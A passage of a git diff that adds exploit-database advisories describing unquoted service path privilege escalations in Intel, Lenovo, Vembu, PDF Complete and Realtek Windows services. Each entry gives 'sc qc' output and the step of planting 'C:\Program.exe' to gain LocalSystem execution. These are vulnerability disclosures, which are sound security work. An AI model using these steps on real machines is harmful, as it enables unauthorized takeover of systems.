+The Intel(R) Management and Security Application Local Management Service (LMS) is installed with an unquoted service path.
+This enables a local privilege escalation vulnerability.
+To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.
+Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
+
+This was tested on version 8.0.1.1399, but other versions may be affected
+as well.
+
+
+---------------------------------------------------------------------------
+
+C:\>sc qc LMS
+
+[SC] QueryServiceConfig SUCCESS
+
+
+
+SERVICE_NAME: LMS
+
+ TYPE : 10 WIN32_OWN_PROCESS
+
+ START_TYPE : 2 AUTO_START (DELAYED)
+
+ ERROR_CONTROL : 1 NORMAL
+
+ BINARY_PATH_NAME : C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
+
+ LOAD_ORDER_GROUP :
+
+ TAG : 0
+
+ DISPLAY_NAME : Intel(R) Management and Security Application Local Management Service
+
+ DEPENDENCIES :
+
+ SERVICE_START_NAME : LocalSystem
+
+---------------------------------------------------------------------------
+
+
+EXAMPLE:
+
+Using the BINARY_PATH_NAME listed above as an example, an executable named
+"Program.exe" could be placed in "C:\", and it would be executed as the
+Local System user next time the service was restarted.
diff --git a/platforms/windows/local/40580.txt b/platforms/windows/local/40580.txt
new file mode 100755
index 000000000..ff70b4f03
--- /dev/null
+++ b/platforms/windows/local/40580.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Lenovo RapidBoot HDD Accelerator - Unquoted Service Path Privilege Escalation
+# Date: 10/19/2016
+# Exploit Author: Joey Lane
+# Version: 1.00.0802
+# Tested on: Windows 7 Professional
+
+The Lenovo RapidBoot HDD Accelerator service is installed with an unquoted service path.
+This enables a local privilege escalation vulnerability.
+To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.
+Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
+
+This was tested on version 1.00.0802, but other versions may be affected as well.
+
+
+---------------------------------------------------------------------------
+
+C:\>sc qc FastbootService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: FastbootService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\Lenovo\RapidBoot HDD Accelerator\FBService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : FastbootService
+ DEPENDENCIES : RPCSS
+ SERVICE_START_NAME : LocalSystem
+
+---------------------------------------------------------------------------
+
+
+EXAMPLE:
+
+Using the BINARY_PATH_NAME listed above as an example, an executable named
+"Program.exe" could be placed in "C:\", and it would be executed as the
+Local System user next time the service was restarted.
+
diff --git a/platforms/windows/local/40581.txt b/platforms/windows/local/40581.txt
new file mode 100755
index 000000000..f2729dc3f
--- /dev/null
+++ b/platforms/windows/local/40581.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Lenovo Slim USB Keyboard - Unquoted Service Path Privilege Escalation
+# Date: 10/19/2016
+# Exploit Author: Joey Lane
+# Version: 1.09
+# Tested on: Windows 7 Professional
+
+The Lenovo Slim USB Keyboard service is installed with an unquoted service path.
+This enables a local privilege escalation vulnerability.
+To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.
+Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
+
+This was tested on version 1.09, but other versions may be affected as well.
+
+
+---------------------------------------------------------------------------
+
+C:\>sc qc Sks8821
+
+[SC] QueryServiceConfig SUCCESS
+
+
+
+SERVICE_NAME: Sks8821
+
+ TYPE : 20 WIN32_SHARE_PROCESS
+
+ START_TYPE : 2 AUTO_START
+
+ ERROR_CONTROL : 1 NORMAL
+
+ BINARY_PATH_NAME : C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\Sks8821.exe
+
+ LOAD_ORDER_GROUP :
+
+ TAG : 0
+
+ DISPLAY_NAME : Skdaemon Service
+
+ DEPENDENCIES :
+
+ SERVICE_START_NAME : LocalSystem
+
+---------------------------------------------------------------------------
+
+
+EXAMPLE:
+
+Using the BINARY_PATH_NAME listed above as an example, an executable named
+"Program.exe" could be placed in "C:\", and it would be executed as the
+Local System user next time the service was restarted.
diff --git a/platforms/windows/local/40582.txt b/platforms/windows/local/40582.txt
new file mode 100755
index 000000000..b3423ab9c
--- /dev/null
+++ b/platforms/windows/local/40582.txt
@@ -0,0 +1,78 @@
+# Exploit Title: Vembu StoreGrid - Unquoted Service Path Privilege Escalation
+# Date: 10/19/2016
+# Exploit Author: Joey Lane
+# Version: 4.0
+# Tested on: Windows Server 2012
+
+StoreGrid is a re-brandable backup solution, which can install 2 services with unquoted service paths.
+This enables a local privilege escalation vulnerability.
+To exploit this vulnerability, a local attacker can insert an executable file in the path of either service.
+Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
+
+This was tested on version 4.0, but other versions may be affected as well.
+
+
+---------------------------------------------------------------------------
+
+C:\>sc qc RemoteBackup
+
+[SC] QueryServiceConfig SUCCESS
+
+
+
+SERVICE_NAME: RemoteBackup
+
+ TYPE : 10 WIN32_OWN_PROCESS
+
+ START_TYPE : 2 AUTO_START
+
+ ERROR_CONTROL : 0 IGNORE
+
+ BINARY_PATH_NAME : C:\Program Files\MSP\RemoteBackup\bin\StoreGrid.exe
+
+
+ LOAD_ORDER_GROUP :
+
+ TAG : 0
+
+ DISPLAY_NAME : RemoteBackup
+
+ DEPENDENCIES :
+
+ SERVICE_START_NAME : LocalSystem
+
+
+C:\>sc qc RemoteBackup_webServer
+
+[SC] QueryServiceConfig SUCCESS
+
+
+
+SERVICE_NAME: RemoteBackup_webServer
+
+ TYPE : 10 WIN32_OWN_PROCESS
+
+ START_TYPE : 2 AUTO_START
+
+ ERROR_CONTROL : 0 IGNORE
+
+ BINARY_PATH_NAME : C:\Program Files\MSP\RemoteBackup\apache\Apache.exe -k runservice
+
+ LOAD_ORDER_GROUP :
+
+ TAG : 0
+
+ DISPLAY_NAME : RemoteBackup_WebServer
+
+ DEPENDENCIES :
+
+ SERVICE_START_NAME : LocalSystem
+
+---------------------------------------------------------------------------
+
+
+EXAMPLE:
+
+Using the BINARY_PATH_NAME listed above as an example, an executable named
+"Program.exe" could be placed in "C:\", and it would be executed as the
+Local System user next time the service was restarted.
diff --git a/platforms/windows/local/40583.txt b/platforms/windows/local/40583.txt
new file mode 100755
index 000000000..b0bd9e35f
--- /dev/null
+++ b/platforms/windows/local/40583.txt
@@ -0,0 +1,49 @@
+# Exploit Title: Intel(R) PROSet/Wireless for Bluetooth(R) + High Speed - Unquoted Service Path Privilege Escalation
+# Date: 10/19/2016
+# Exploit Author: Joey Lane
+# Version: 15.1.0.0096
+# Tested on: Windows 7 Professional
+
+The Intel(R) PROSet/Wireless for Bluetooth(R) + High Speed service is installed with an unquoted service path.
+This enables a local privilege escalation vulnerability.
+To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.
+Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
+This was tested on version 15.1.0.0096, but other versions may be affected as well.
+
+
+---------------------------------------------------------------------------
+
+C:\>sc qc AMPPALR3
+
+[SC] QueryServiceConfig SUCCESS
+
+
+
+SERVICE_NAME: AMPPALR3
+
+ TYPE : 10 WIN32_OWN_PROCESS
+
+ START_TYPE : 2 AUTO_START (DELAYED)
+
+ ERROR_CONTROL : 1 NORMAL
+
+ BINARY_PATH_NAME : C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
+
+ LOAD_ORDER_GROUP :
+
+ TAG : 0
+
+ DISPLAY_NAME : Intelr Centrinor Wireless Bluetoothr + High Speed Service
+
+ DEPENDENCIES :
+
+ SERVICE_START_NAME : LocalSystem
+
+---------------------------------------------------------------------------
+
+
+EXAMPLE:
+
+Using the BINARY_PATH_NAME listed above as an example, an executable named
+"Program.exe" could be placed in "C:\", and it would be executed as the
+Local System user next time the service was restarted.
diff --git a/platforms/windows/local/40585.txt b/platforms/windows/local/40585.txt
new file mode 100755
index 000000000..89ae35af9
--- /dev/null
+++ b/platforms/windows/local/40585.txt
@@ -0,0 +1,55 @@
+# Exploit Title: Lenovo ThinkVantage Communications Utility - Unquoted Service Path Privilege Escalation
+# Date: 10/19/2016
+# Exploit Author: Joey Lane
+# Version: 3.0.42.0
+# Tested on: Windows 7 Professional
+
+The Lenovo ThinkVantage Communications Utility installs 2 services with unquoted
+service paths. This enables a local privilege escalation vulnerability.
+To exploit this vulnerability, a local attacker can insert an executable file in the path
+of either service. Rebooting the system or restarting either service will run the malicious
+executable with elevated privileges.
+
+
+This was tested on version 3.0.42.0, but other versions may be affected as well.
+
+
+---------------------------------------------------------------------------
+
+C:\>sc qc LENOVO.CAMMUTE
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: LENOVO.CAMMUTE
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\Program Files\Lenovo\Communications Utility\CAMMUTE.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Lenovo Camera Mute
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+C:\>sc qc LENOVO.TPKNRSVC
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: LENOVO.TPKNRSVC
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Lenovo Keyboard Noise Reduction
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+---------------------------------------------------------------------------
+
+
+EXAMPLE:
+
+Using the BINARY_PATH_NAME listed above as an example, an executable named
+"Program.exe" could be placed in "C:\", and it would be executed as the
+Local System user next time the service was restarted.
diff --git a/platforms/windows/local/40586.txt b/platforms/windows/local/40586.txt
new file mode 100755
index 000000000..78d212b23
--- /dev/null
+++ b/platforms/windows/local/40586.txt
@@ -0,0 +1,41 @@
+# Exploit Title: PDF Complete Corporate Edition - Unquoted Service Path Privilege Escalation
+# Date: 10/19/2016
+# Exploit Author: Joey Lane
+# Software Link: http://www.pdfcomplete.com/cms/Downloads.aspx
+# Version: 4.1.12
+# Tested on: Windows 7 Professional
+
+PDF Complete Corporate Edition installs a service with an unquoted service path.
+This enables a local privilege escalation vulnerability. To exploit this vulnerability,
+a local attacker can insert an executable file in the path of the service.
+Rebooting the system or restarting the service will run the malicious executable
+with elevated privileges.
+
+
+This was tested on version 4.1.12, but other versions may be affected as well.
+
+
+---------------------------------------------------------------------------
+
+C:\>sc qc pdfcDispatcher
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: pdfcDispatcher
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\PDF Complete\pdfsvc.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : PDF Document Manager
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+---------------------------------------------------------------------------
+
+
+EXAMPLE:
+
+Using the BINARY_PATH_NAME listed above as an example, an executable named
+"Program.exe" could be placed in "C:\", and it would be executed as the
+Local System user next time the service was restarted.
diff --git a/platforms/windows/local/40587.txt b/platforms/windows/local/40587.txt
new file mode 100755
index 000000000..5ea8b6e56
--- /dev/null
+++ b/platforms/windows/local/40587.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Realtek High Definition Audio Driver - Unquoted Service Path Privilege Escalation
+# Date: 10/19/2016
+# Exploit Author: Joey Lane
+# Version: 6.0.1.6730
+# Tested on: Windows 7 Professional
+
+The Realtek High Definition Audio Driver installs a service with an unquoted service path.
+This enables a local privilege escalation vulnerability. To exploit this vulnerability,
+a local attacker can insert an executable file in the path of the service.
+Rebooting the system or restarting the service will run the malicious executable
+with elevated privileges.
+
+
+This was tested on version 6.0.1.6730, but other versions may be affected as well.
+
+
+---------------------------------------------------------------------------
+
+C:\>sc qc RtkAudioService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: RtkAudioService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
+ LOAD_ORDER_GROUP : PlugPlay
+ TAG : 0
+ DISPLAY_NAME : Realtek Audio Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+---------------------------------------------------------------------------
+
+
+EXAMPLE:
+
+Using the BINARY_PATH_NAME listed above as an example, an executable named
+"Program.exe" could be placed in "C:\", and it would be executed as the
+Local System user next time the service was restarted.